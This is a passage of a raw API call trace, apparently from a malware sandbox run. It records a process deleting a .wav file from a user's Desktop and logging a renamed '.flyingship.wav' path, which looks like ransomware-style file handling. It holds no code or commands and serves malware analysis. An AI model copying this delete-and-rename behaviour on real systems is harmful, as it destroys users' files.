HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.418] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.419] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.419] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0161.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.419] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.422] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.422] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.422] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", lpFilePart=0x0) returned 0x39 [0161.423] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0x5a3e560, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 0x90ae18 [0161.423] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjmnmjqzifmsie_.wav")) returned 1 [0161.426] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0x5a3e560, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 0 [0161.426] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.427] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.427] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.428] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.428] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0161.428] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.428] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0161.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.429] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0161.429] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x64c, lpOverlapped=0x0) returned 1 [0161.429] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0161.429] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x64c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.429] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0161.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0161.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa4f8 [0161.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav\r\n", cchWideChar=71, lpMultiByteStr=0x9aa4f8, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 71 [0161.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0161.430] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x46, lpOverlapped=0x0) returned 1 [0161.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.430] CloseHandle (hObject=0x138) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0161.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.436] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.436] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.436] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.437] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0161.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0161.438] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 